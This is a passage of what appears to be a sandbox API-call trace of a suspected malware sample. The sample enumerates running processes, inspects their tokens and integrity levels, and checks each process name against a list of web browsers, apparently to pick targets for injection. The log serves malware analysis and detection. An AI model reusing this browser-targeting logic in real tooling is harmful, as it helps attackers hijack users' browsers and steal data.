ReturnLength=0xfcfab8) returned 0 [0247.261] GetLastError () returned 0x7a [0247.261] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0247.261] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0247.261] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0247.261] lstrcmpiW (lpString1="firefox.exe", lpString2="gateway.exe") returned -1 [0247.261] lstrcmpiW (lpString1="chrome.exe", lpString2="gateway.exe") returned -1 [0247.261] lstrcmpiW (lpString1="opera.exe", lpString2="gateway.exe") returned 1 [0247.261] lstrcmpiW (lpString1="iexplore.exe", lpString2="gateway.exe") returned 1 [0247.262] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="gateway.exe") returned 1 [0247.262] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="gateway.exe") returned 1 [0247.262] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x870) returned 0x548 [0247.262] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0247.262] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0247.262] GetLastError () returned 0x7a [0247.262] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0247.262] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0247.262] CloseHandle (hObject=0x340) returned 1 [0247.262] CloseHandle (hObject=0x548) returned 1 [0247.262] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0247.262] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0247.262] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0247.262] GetLastError () returned 0x7a [0247.262] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0247.262] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0247.262] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0247.262] lstrcmpiW (lpString1="firefox.exe", lpString2="laden.exe") returned -1 [0247.262] lstrcmpiW (lpString1="chrome.exe", lpString2="laden.exe") returned -1 [0247.262] lstrcmpiW (lpString1="opera.exe", lpString2="laden.exe") returned 1 [0247.262] lstrcmpiW (lpString1="iexplore.exe", lpString2="laden.exe") returned -1 [0247.262] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="laden.exe") returned 1 [0247.262] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="laden.exe") returned 1 [0247.262] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x880) returned 0x548 [0247.262] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0247.262] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0247.262] GetLastError () returned 0x7a [0247.262] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0247.262] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0247.262] CloseHandle (hObject=0x340) returned 1 [0247.262] CloseHandle (hObject=0x548) returned 1 [0247.262] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0247.262] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0247.262] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0247.263] GetLastError () returned 0x7a [0247.263] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0247.263] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0247.263] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0247.263] lstrcmpiW (lpString1="firefox.exe", lpString2="lying-yourself.exe") returned -1 [0247.263] lstrcmpiW (lpString1="chrome.exe", lpString2="lying-yourself.exe") returned -1 [0247.263] lstrcmpiW (lpString1="opera.exe", lpString2="lying-yourself.exe") returned 1 [0247.263] lstrcmpiW (lpString1="iexplore.exe", lpString2="lying-yourself.exe") returned -1 [0247.263] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="lying-yourself.exe") returned 1 [0247.263] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="lying-yourself.exe") returned 1 [0247.263] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x890) returned 0x548 [0247.263] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0247.263] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0247.263] GetLastError () returned 0x7a [0247.263] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0247.263] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0247.263] CloseHandle (hObject=0x340) returned 1 [0247.263] CloseHandle (hObject=0x548) returned 1 [0247.263] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0247.263] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0247.263] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0247.263] GetLastError () returned 0x7a [0247.263] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0247.263] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0247.263] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0247.263] lstrcmpiW (lpString1="firefox.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0247.263] lstrcmpiW (lpString1="chrome.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned -1 [0247.263] lstrcmpiW (lpString1="opera.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0247.263] lstrcmpiW (lpString1="iexplore.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0247.263] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0247.263] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0247.263] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8a0) returned 0x548 [0247.263] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0247.263] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0247.263] GetLastError () returned 0x7a [0247.264] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0247.264] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0247.264] CloseHandle (hObject=0x340) returned 1 [0247.264] CloseHandle (hObject=0x548) returned 1 [0247.264] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0247.264] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0247.264] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0247.264] GetLastError () returned 0x7a [0247.264] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0247.264] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0247.264] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0247.264] lstrcmpiW (lpString1="firefox.exe", lpString2="colleague wrap.exe") returned 1 [0247.264] lstrcmpiW (lpString1="chrome.exe", lpString2="colleague wrap.exe") returned -1 [0247.264] lstrcmpiW (lpString1="opera.exe", lpString2="colleague wrap.exe") returned 1 [0247.264] lstrcmpiW (lpString1="iexplore.exe", lpString2="colleague wrap.exe") returned 1 [0247.264] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="colleague wrap.exe") returned 1 [0247.264] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="colleague wrap.exe") returned 1 [0247.264] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8b0) returned 0x548 [0247.264] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0247.264] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0247.264] GetLastError () returned 0x7a [0247.264] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0247.264] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0247.264] CloseHandle (hObject=0x340) returned 1 [0247.264] CloseHandle (hObject=0x548) returned 1 [0247.264] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0247.264] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0247.264] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0247.264] GetLastError () returned 0x7a [0247.264] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0247.264] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0247.264] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0247.264] lstrcmpiW (lpString1="firefox.exe", lpString2="hottest-jm-depression-fought.exe") returned -1 [0247.264] lstrcmpiW (lpString1="chrome.exe", lpString2="hottest-jm-depression-fought.exe") returned -1 [0247.265] lstrcmpiW (lpString1="opera.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0247.265] lstrcmpiW (lpString1="iexplore.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0247.265] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0247.265] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0247.265] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8c8) returned 0x548 [0247.265] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0247.265] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0247.265] GetLastError () returned 0x7a [0247.265] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0247.265] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0247.265] CloseHandle (hObject=0x340) returned 1 [0247.265] CloseHandle (hObject=0x548) returned 1 [0247.265] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0247.265] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0247.265] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0247.265] GetLastError () returned 0x7a [0247.265] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0247.265] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0247.265] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0247.265] lstrcmpiW (lpString1="firefox.exe", lpString2="saturday.exe") returned -1 [0247.265] lstrcmpiW (lpString1="chrome.exe", lpString2="saturday.exe") returned -1 [0247.265] lstrcmpiW (lpString1="opera.exe", lpString2="saturday.exe") returned -1 [0247.265] lstrcmpiW (lpString1="iexplore.exe", lpString2="saturday.exe") returned -1 [0247.265] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="saturday.exe") returned -1 [0247.265] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="saturday.exe") returned -1 [0247.265] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9a0) returned 0x0 [0247.265] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9e0) returned 0x0 [0247.265] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbe8) returned 0x0 [0247.265] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6cc) returned 0x0 [0247.265] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa18) returned 0x0 [0247.265] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5fc) returned 0x548 [0247.265] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0247.265] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0247.265] GetLastError () returned 0x7a [0247.265] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0247.266] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0247.266] CloseHandle (hObject=0x340) returned 1 [0247.266] CloseHandle (hObject=0x548) returned 1 [0247.266] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0247.266] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0247.266] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0247.266] GetLastError () returned 0x7a [0247.266] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0247.266] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0247.266] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0247.266] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0247.266] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0247.266] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0247.266] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0247.266] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0247.266] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0247.266] VirtualFree (lpAddress=0x340000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0247.266] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0249.269] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0xfcfadc | out: SystemInformation=0x0, ResultLength=0xfcfadc*=0xbd08) returned 0xc0000004 [0249.269] VirtualAlloc (lpAddress=0x0, dwSize=0xcd08, flAllocationType=0x1000, flProtect=0x4) returned 0x340000 [0249.270] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x340000, Length=0xcd08, ResultLength=0x0 | out: SystemInformation=0x340000, ResultLength=0x0) returned 0x0 [0249.270] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0249.270] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0249.270] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0249.270] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x14c) returned 0x0 [0249.270] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0249.270] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0249.270] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0249.270] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0249.270] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e4) returned 0x0 [0249.270] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ec) returned 0x0 [0249.270] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x258) returned 0x0 [0249.270] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0249.270] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0x0 [0249.270] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0x0 [0249.270] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0 [0249.270] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0 [0249.270] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0249.270] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0249.270] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x160) returned 0x0 [0249.270] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x418) returned 0x0 [0249.270] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4dc) returned 0x0 [0249.270] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4e4) returned 0x548 [0249.271] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0249.271] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0249.271] GetLastError () returned 0x7a [0249.271] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0249.271] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0249.271] CloseHandle (hObject=0x340) returned 1 [0249.271] CloseHandle (hObject=0x548) returned 1 [0249.271] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0249.271] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: 